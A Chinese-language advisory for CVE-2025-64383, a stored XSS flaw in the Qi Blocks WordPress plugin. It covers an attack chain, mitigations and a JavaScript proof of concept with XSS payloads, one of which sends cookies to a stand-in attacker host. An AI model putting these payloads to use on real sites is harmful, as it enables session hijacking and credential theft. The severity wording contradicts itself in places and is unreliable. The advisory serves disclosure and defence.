CVE-2025-64383 Qi Blocks插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64383

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Qi Blocks WordPress Plugin

漏洞概述

CVE-2025-64383是WordPress插件Qi Blocks中的一个高危存储型跨站脚本(XSS)漏洞。该漏洞存在于插件的页面生成功能中，由于对用户输入没有进行充分的过滤和转义，攻击者可以在特定模块中注入恶意JavaScript代码。当其他用户访问包含恶意代码的页面时，攻击脚本会在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、恶意重定向等严重后果。由于是存储型XSS，恶意代码会永久保存在服务器端，影响所有访问该页面的用户。此漏洞影响Qi Blocks插件1.4.3及以下所有版本，CVSS评分6.5，属于中等严重程度，但考虑到攻击的隐蔽性和影响范围，仍需及时修复。

技术细节

该存储型XSS漏洞源于Qi Blocks插件在处理用户输入时缺少适当的输入验证和输出编码。攻击者可以利用WordPress管理员或作者权限，在创建或编辑包含特定Qi Blocks模块的页面时，在模块内容中嵌入恶意脚本代码。由于插件未对输入内容进行HTML实体转义，这些恶意代码会被直接存储在数据库中。当其他用户访问包含该模块的页面时，服务器会从数据库读取并输出未经转义的内容，导致浏览器将其解析为可执行脚本。攻击者通常利用此漏洞窃取用户Cookie、劫持会话、执行任意操作或进行钓鱼攻击。由于存储型XSS的执行不需要用户交互即可触发，攻击具有持久性和广泛影响性。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Qi Blocks插件版本，确认版本 <= 1.4.3

STEP 2

步骤2: 获取权限

攻击者获取WordPress contributor、author、editor或admin权限账户

STEP 3

步骤3: 注入恶意代码

在创建或编辑页面时，通过Qi Blocks模块的输入字段注入XSS恶意脚本，如<script>标签或事件处理器

STEP 4

步骤4: 保存发布

攻击者保存并发布包含恶意代码的页面，脚本被永久存储到数据库

STEP 5

步骤5: 等待触发

当其他用户（管理员、访问者等）访问包含恶意代码的页面时，浏览器执行注入的JavaScript

STEP 6

步骤6: 恶意操作

攻击者通过执行的脚本窃取Cookie、会话令牌，进行会话劫持或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64383 Stored XSS PoC for Qi Blocks Plugin
// This PoC demonstrates how to inject malicious JavaScript through Qi Blocks modules

// Step 1: Identify vulnerable Qi Blocks module input field
// The vulnerability exists in various Qi Blocks module content fields

// Step 2: Inject XSS payload in module content
const xssPayload = '<script>alert(document.cookie)</script>';
const imgPayload = '<img src=x onerror=alert(document.domain)>';
const svgPayload = '<svg/onload=fetch("https://attacker.com/steal?c="+document.cookie)>';

// Step 3: Example WordPress REST API request to create/edit post with XSS
const createPostPayload = {
    title: 'Test Post with XSS',
    content: '<!-- wp:qi-blocks/module-block -->\n<div class="qi-blocks-module">\n' + xssPayload + '\n</div>\n<!-- /wp:qi-blocks/module-block -->',
    status: 'publish'
};

// Step 4: Send the malicious request (requires contributor+ role)
fetch('/wp-json/wp/v2/posts', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'X-WP-Nonce': wpNonce // WordPress nonce required
    },
    body: JSON.stringify(createPostPayload)
});

// Step 5: When any user visits the published page, the XSS will execute
console.log('XSS payload stored in Qi Blocks module');

影响范围

Qi Blocks <= 1.4.3

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制Qi Blocks插件的使用权限，仅允许受信任的管理员使用；2) 启用WordPress的REST API访问限制；3) 使用网站应用防火墙(WAF)过滤恶意请求；4) 定期审查所有页面内容，检测潜在的XSS注入代码；5) 对所有用户进行安全意识培训，避免点击可疑链接；6) 考虑暂时禁用Qi Blocks插件直至修复版本发布。